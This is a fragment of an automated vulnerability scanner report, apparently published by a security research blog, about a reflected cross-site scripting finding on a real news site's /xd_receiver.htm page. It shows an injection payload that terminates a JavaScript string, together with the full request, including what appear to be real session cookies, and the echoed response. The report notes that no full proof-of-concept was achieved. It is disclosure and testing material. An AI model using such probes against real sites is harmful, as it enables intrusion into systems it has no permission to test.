X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51975


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_tops-counter9695b';70d3a961d05_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

1.21. http://www.thestar.com/xd_receiver.htm [REST URL parameter 1]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.thestar.com
Path:   /xd_receiver.htm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6418'%3b04d0a14a0d6 was submitted in the REST URL parameter 1. This input was echoed as d6418';04d0a14a0d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /d6418'%3b04d0a14a0d6 HTTP/1.1
Host: www.thestar.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/extern/login_status.php?api_key=e52ab4b1285fa2e64697937423b7772b&extern=0&channel=http%3A%2F%2Fwww.thestar.com%2Fxd_receiver.htm&locale=en_US
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26AEC217851D1E5A-4000010120486970[CE]; UserLastLogin=2011-02-17 15:07:44; ASP.NET_SessionId=s3nyc032t0kvzc2e1vv1gv45; BIGipServerTOPS-WebFarm5=604050348.20480.0000; s_cc=true; s_vnumb=1299368826776%3E0%3A1-16%3A2; s_vnumb_s=3; s_sq=%5B%5BB%5D%5D; __utmz=129518793.1299368840.3.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=129518793.1069648812.1297974345.1297998573.1299368836.3; __utmc=129518793; __utmb=129518793.1.10.1299368836

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Expires: Sat, 05 Mar 2011 23:48:29 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
WS: 2-3
cache-control: public, max-age = 300
Date: Sat, 05 Mar 2011 23:43:55 GMT
X-Varnish: 2676941130
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Svr: topsvarnish5-4
X-Cache: MISS
Content-Length: 51337


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addyn/3.0/5214.1/987201/0/-1/ADTECH;loc=100;target=_blank;alias=thestar_d6418';04d0a14a0d6_hub_237x90_1;size=237x90;key=;grp='+window.adgroupid+';misc='+new Date().getTime()+';aduho='+offset+';rdclick=">
...[SNIP]...

Report generated by XSS.CX Research Blog at Sat Mar 05 20:33:35 CST 2011.